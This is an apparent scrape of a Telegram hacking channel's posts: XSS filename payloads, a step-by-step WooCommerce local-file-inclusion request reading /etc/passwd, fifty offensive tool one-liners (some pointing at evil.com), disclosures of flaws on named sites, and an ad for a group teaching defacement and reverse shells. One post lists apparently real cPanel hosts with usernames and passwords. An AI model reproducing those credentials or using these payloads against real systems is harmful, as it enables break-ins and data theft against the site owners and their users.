hacking vidhya
Open in Telegram
No data
Subscribers
-824 hours
-137 days
+3730 days
Posts Archive
Dalfox v2.10.0 released! It uses way less CPU while XSS scanning even faster than before.
github.com/hahwul/dalfox
#DAST #Security #BugBounty
Don’t forget to drop your reactions & stars! ⭐️✨ — Your support keeps me going! 🔋🚀
🔗 @hacking_vidhya
🛠 ExplainShell – Decode Shell Commands
Found a complex command in a PoC or exploit? Paste it into ExplainShell and see a breakdown of each argument.
🔍 Great for analyzing payloads, understanding Linux commands, and improving your skills.
Essential for Bug Bounty & Pentesting.
Don’t forget to drop your reactions & stars! ⭐️✨ — Your support keeps me going! 🔋🚀
🔗 @hacking_vidhya
🚨 CORS Misconfiguration Found! 🚨
I discovered a CORS vulnerability in Drop Organization! 😈🔥
🔍 Vulnerable Domain: drop.org.in/wp-json
This misconfiguration allows attackers to access API responses from any origin, potentially leading to sensitive data leaks! 🚨⚠️
Stay tuned for more security findings and exploit insights! 📡💻
Don’t forget to drop your reactions & stars! ⭐️✨ — Your support keeps me going! 🔋🚀
🔗 @hacking_vidhya
poc
If you found a file upload function for an image, try introducing an image with XSS in the filename like so:
<img src=x onerror=alert('XSS')>.png "><img src=x onerror=alert('XSS')>.png "><svg onmouseover=alert(1)>.svg <<script>alert('xss')<!--a-->a.png Don’t forget to drop your reactions & stars ⭐️✨—your support fuels my energy to post more content! 🔋🚀 🔗 @hacking_vidhya
🚀 Directory Path Traversal Found on Reddit! 🔥
I discovered a directory path traversal vulnerability at Reddit! 🕵️♂️ Check out the archived link below and try accessing it via Wayback Machine:
🔗 https://web.archive.org/web/20220823104615/https://www.reddit.com/etc/passwd
This is why archived URLs can be goldmines for bug hunters! 🏆💻
Don’t forget to drop your reactions & stars ⭐️✨—your support fuels my energy to post more content! 🔋🚀
🔗 @hacking_vidhya
Reson(They say out of scop)
http://futurechampz.in:2083|future46|X8uf2j71sW
http://remediadl.ro:2083|remedia|#Metalurgiei78
http://farmaciileremedia.ro:2083|remedia|#Metalurgiei78
http://advibe.ro:2083|advibe|#Parincea6
http://ecngx303.inmotionhosting.com:2083|doroub6|Admingheat040
http://surya.co.in:2083|suryaco|WkqO=Xq9Es67
http://farmaciileremedia.ro:2083|remedia|#Metalurgiei78
http://bom1plzcpnl503488.prod.bom1.secureserver.net:2083|hhq2fwra1w8i|Raghav@0606
http://br228.hostgator.com.br:2083|proj6436|wC9y0c7S6a
http://srv32.usacloudserver.online:2083|fastearnco|Ecco1438@@ss
http://ns1.jenetworks.co.ke:2083|jmsurfco|jmjose01@ProfJM
http://ns1.jenetworks.co.ke:2083|jmsurfco|jmjose01@ProfJM
http://webinartarusmedia.ro:2083|webinartarusmedi|Ytd&Y@PCk4hS
http://futurechampz.in:2082|future46|X8uf2j71sW
http://sxb1plzcpnl503821.prod.sxb1.secureserver.net:2083|whp1uumnv8sh|tht$9BU3kOtk
WooCommerce plugin allows LFI! 🍃
02: Capture request in Burp
03: Change request method to POST and add:
POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1
04: Also add:
action=woof_text_search&
05: That’s it! You got local files.
Don’t forget the reactions and stars⭐️!
They fuel my energy to post such contents🔋✨.
@hacking_vidhya
ʙᴜɢ ʙᴏᴜɴᴛʏ ᴀɴᴅ ᴡᴇʙ ʜᴀᴄᴋɪɴɢ 🚩
💀- ᴘʀɪᴄᴇ ᴛᴇᴍᴘʀɪɴɢ
💀- ᴅᴇғᴀᴄᴇ ᴡᴇʙsɪᴛᴇ
💀- sǫʟ ɪɴᴊᴇᴄᴛɪᴏɴ
💀- ʀᴇᴠᴇʀsʜ sʜᴇʟʟ
💀- ᴅᴇғᴀᴄᴇ ᴘᴀɢᴇ ᴍᴀᴋᴇ
💀- ᴇᴛᴄ
😊 ᴏɴʟʏ ᴊᴏɪɴ 𝟷𝟶 ᴘᴇʀsᴏɴᴇ 😊
https://t.me/+xseyDfEq5roxNDM1
https://t.me/+xseyDfEq5roxNDM1
https://t.me/+xseyDfEq5roxNDM1
Get 1 Month FREE Genspark Plus Membership
Benefits:
✅ Unlimited Searches
✅ Priority Access – 5x more usage than free users
✅ Access to All Top-Tier AI Models:**
- OpenAI (o1, o3-mini, GPT-4o)
- Anthropic Claude Sonnet
- Google Gemini
- DeepSeek
- And more...
✅ Access to the Latest Image Generation Models:
- FLUX
- Ideogram
- Recraft
- DALL·E
- Gemini Imagen
- And more...
✅ Access to the Latest Video Generation Models:
- Kling
- PixVerse
- Lumalabs
- And more...
🔗 Claim your free membership now:
[Genspark Invite Link]
Hello Telegram Team This Channel Does Not Promote Any Illegal Activities We Are Following Telegram Guidelines Thank You @Rove
مرحباً بفريق Telegram، هذه القناة لا تروج لأي أنشطة غير قانونية، نحن نتبع إرشادات Telegram، شكرًا لك @Rove
Привет, команда Telegram. Этот канал не пропагандирует никакую незаконную деятельность. Мы следуем правилам Telegram. Спасибо @Rove.
50 Bug bounty tips for my lovely dovely fam <3
1️⃣ Use sqlmap --risk=3 --level=5 for aggressive SQLi testing.
2️⃣ Automate XSS hunting with Dalfox -b http://yourxsscollab.com -u http://target.com 🚀
3️⃣ Check for subdomain takeovers with subzy --targets subdomains.txt
4️⃣ Use amass enum -passive -d http://target.com for deep subdomain recon 🌎
5️⃣ Bypass WAFs with ffuf -w payloads.txt -u https://target.com/FUZZ -H "X-Originating-IP: 127.0.0.1"
6️⃣ Automate JWT cracking with jwt_tool -C -t token.jwt --wordlist rockyou.txt 🔑
7️⃣ Scan GraphQL endpoints with GraphQLmap -u https://target.com/graphql 🛠
8️⃣ Bruteforce hidden directories with dirsearch -u https://target.com -e php,html,js
9️⃣ Find misconfigured S3 buckets with aws s3 ls s3://bucket-name/ --no-sign-request ☁️
🔟 Bypass SSRF restrictions by resolving DNS using Burp Collaborator
1️⃣1️⃣ Check for open redirects with qsreplace 'https://evil.com' | httpx -silent 🔄
1️⃣2️⃣ Use subfinder -d http://target.com | httpx -silent to filter live subdomains 🏠
1️⃣3️⃣ Hunt for leaked API keys with truffleHog --regex --entropy=True 🔑
1️⃣4️⃣ Automate CORS misconfig detection with Corsy -u https://target.com
1️⃣5️⃣ Enumerate subdomains via http://crt.sh with curl "https://crt.sh/?q=%.target.com&output=json"
1️⃣6️⃣ Scan for open ports with nmap -p- -T4 -A http://target.com 🔍
1️⃣7️⃣ Find webhooks & exposed APIs with gf webhook | httpx -silent
1️⃣8️⃣ Automate CSRF token stealing with Burp Suite Autorize Plugin
1️⃣9️⃣ Extract secrets from .git with git-dumper https://target.com/.git /output-dir 🕵️♂️
2️⃣0️⃣ Scan for JWT weak secrets with jwtcrack -t token.jwt -w rockyou.txt
2️⃣1️⃣ Fuzz POST parameters with ffuf -X POST -d "param=FUZZ" -w payloads.txt -u http://target.com
2️⃣2️⃣ Automate broken authentication checks with nuclei -t cves/ -l targets.txt 🔓
2️⃣3️⃣ Automate IDOR checks with ParamSpider -d http://target.com 🕸
2️⃣4️⃣ Search for AWS credentials with ripgrep -e "AKIA[A-Z0-9]{16}"
2️⃣5️⃣ Bypass CSP with JSONP endpoints using jsonp-hunter -u http://target.com
2️⃣6️⃣ Check for template injection with tplmap -u https://target.com -p param 🛠
2️⃣7️⃣ Hunt for subdomain takeovers using subjack -w subdomains.txt -t 50 -o results.txt
2️⃣8️⃣ Automate WebSocket testing with wssip -u wss://target.com 🔌
2️⃣9️⃣ Scan for vulnerable third-party libraries with Retire.js 🔥
3️⃣0️⃣ Extract exposed API keys from JavaScript with linkfinder -i target.js
3️⃣1️⃣ Test for Host header attacks using curl -H "Host: http://evil.com" https://target.com
3️⃣2️⃣ Extract parameters from JS files using ParamSpider -d http://target.com
3️⃣3️⃣ Use xsstrike -u https://target.com for automated XSS scanning 🛡
3️⃣4️⃣ Automate GraphQL security scanning with InQL Scanner
3️⃣5️⃣ Automate API token brute-force with patator http_fuzz
3️⃣6️⃣ Scan for misconfigured Firebase databases with http://firebaseScanner.py http://target.com 🔥
3️⃣7️⃣ Use dnsx -l subdomains.txt -silent -a to resolve A records of subdomains
3️⃣8️⃣ Scan for HTTP smuggling vulnerabilities with http://smuggler.py -u https://target.com
3️⃣9️⃣ Bruteforce JWT signing keys with crackjwt --token token.jwt --wordlist rockyou.txt 🔑
4️⃣0️⃣ Use hakrawler -url https://target.com -depth 2 -plain to extract URLs
4️⃣1️⃣ Fuzz REST API endpoints with ffuf -u https://target.com/api/FUZZ -w wordlist.txt
4️⃣2️⃣ Test for blind XSS using http://xsshunter.com payloads
4️⃣3️⃣ Hunt for forgotten test endpoints with waybackurls http://target.com | gf test-endpoints
4️⃣4️⃣ Scan for HTTP/2 desync vulnerabilities with request-smuggler
4️⃣5️⃣ Find outdated WordPress plugins using wpscan --url https://target.com
4️⃣6️⃣ Automate reverse shell generation using msfvenom 🎯
4️⃣7️⃣ Discover parameter pollution vulnerabilities with arjun -u https://target.com
4️⃣8️⃣ Find misconfigured Open Redirects using OpenRedireX
4️⃣9️⃣ Scan for CSP weaknesses using csp-evaluator 🛡
5️⃣0️⃣ Find duplicate passwords in response bodies with gf passwords
Don’t forget the reactions and stars⭐️!
They fuel my energy to post such contents🔋✨.
@hacking_vidhya
hacker toolkit
rfid reader
rtl-sdr adapter
wifi adapter (packet injection)
multi blue
Wifi pinapple
key croc
shark jack
usb ruber ducky
screen crab
https://shop.hak5.org/
Don’t forget the reactions and stars⭐️!
They fuel my energy to post such contents🔋✨.
@hacking_vidhya
play a safe and joyful holi! respect everyone, especially women—no harm, no force, just colors and happiness. celebrate with love, laughter, and family. let’s keep the spirit of holi alive with peace and positivity. 🌸🎨💜 from team hacking vidhya. #playsafe #holicelebration #spreadlove
